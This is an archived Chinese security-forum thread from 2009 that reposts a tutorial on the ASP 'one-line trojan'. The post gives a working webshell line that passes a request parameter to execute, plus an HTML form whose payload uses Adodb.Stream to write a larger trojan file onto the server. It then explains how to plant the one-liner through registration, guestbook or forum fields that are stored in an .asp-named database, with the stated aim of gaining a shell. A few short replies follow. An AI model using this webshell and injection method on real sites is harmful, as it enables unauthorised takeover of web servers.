Board logo

标题: [转载] ASP一句话木马原理 [打印本页]

作者: plantseth    时间: 2009-6-2 17:15     标题: ASP一句话木马原理

前不久,跟一个网友测试网站.各方面的安全性做的还不错.用了各种方法都没拿下SHELL,最后被我用一句话木马搞定了.心血来潮,就写了这篇文章,希望能给一些朋友带来点帮助.

要知道,一般我们无法查看网站的ASP源码,那么换个思路,我们可不可以把ASP语句写入网站呢?这样的话,嘿嘿.......

相信懂ASP的人都不陌生,在ASP里有一句语句<%execute ............")%>意思是执行省略号里的语句.那么如果我写进我们精心构造的语句,它也是会帮我们执行的.

(现在先假设在远程主机的TEXT.ASP中已经有了<%execute request("value")%>这个语句.)就按照这上面的思路,我们就可以在本地构造一个表单内容如下:(//为注释)

<form action=http://主机路径/TEXT.asp method=post>

<textarea name=value cols=120 rows=10 width=45>

set lP=server.createObject("Adodb.Stream")//建立流对象
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("newvalue")

lP.SaveToFile server.mappath("newmm.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式        
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "newmm.asp" //转向newmm.asp

</textarea>

<textarea name=newvalue cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br>
<input type=submit value=提交>

</form>


开先我们不是假设远程主机的TEXT.ASP这个文件里有这么<%execute request("value")%>一句吗?表单的作用就是把我们表单里的内容提交到远程主机的TEXT.ASP这个文件.然后因为TEXT.ASP里有<%execute request("value")%>这句,那么这句代码就会执行我们从表单里传来的内容哦.(表单名必须和<%execute request("value")%>里的VALUE一样,就是我用蓝色标记的那两处,必须相等)

说到这里大家是不是清楚了.我们构造了两个表单,第一个表单里的代码是文件操作的代码(就是把第二个表单内的内容写入在当前目录下并命名为newvalue.ASP的这么一段操作的处理代码)那么第二个表单当然就是我们要写入的马了.

具体的就是下面这一段:

set lP=server.createObject("Adodb.Stream")//建立流对象
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("newvalue")

lP.SaveToFile server.mappath("newvalue.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式        
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "newmm.asp" //转向newmm.asp

这样的话第二个表单的名字必须和lP.writetext request("newvalue") 里的Newvalue一样,就是我用红色标注的那两处.

啊,基本说完了,对于不懂ASP的朋友,理解起来是有点难度.

好,刚才是假设主机存在<%execute request("value")%>那么对于平常的网站又没有这句我们怎么下手呢
有个条件,假如你得到了它的数据库名,(当然我这里说的是它的后缀是以ASP结尾的,你下载不了它的数据库,要不然的话我这篇文章不是白写了吗)那么你就在网站留言也好,论坛也好,注册也好,只要有表单的地方写入这名<%execute request("value")%>,比如说注册的名字你用这个.不行的话写在简介里啊等.......

只要注册成功,那么它的数据库里就含有了<%execute request("value")%>这个语句.那么表单的路径就换为

<form action=http://主机路径/数据库名.ASP method=post>

好了,把你的大马写在第二个表单里提交吧.

等着拿SHELL吧!
作者: winver    时间: 2009-6-2 21:35

等我学了ASP着一定要用用
作者: 394931603    时间: 2009-6-8 09:18

1# plantseth


假如留言那里把<>替换了是不是就不可以了。
作者: zrz444    时间: 2009-6-8 15:14

这个好象很久了吧??




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2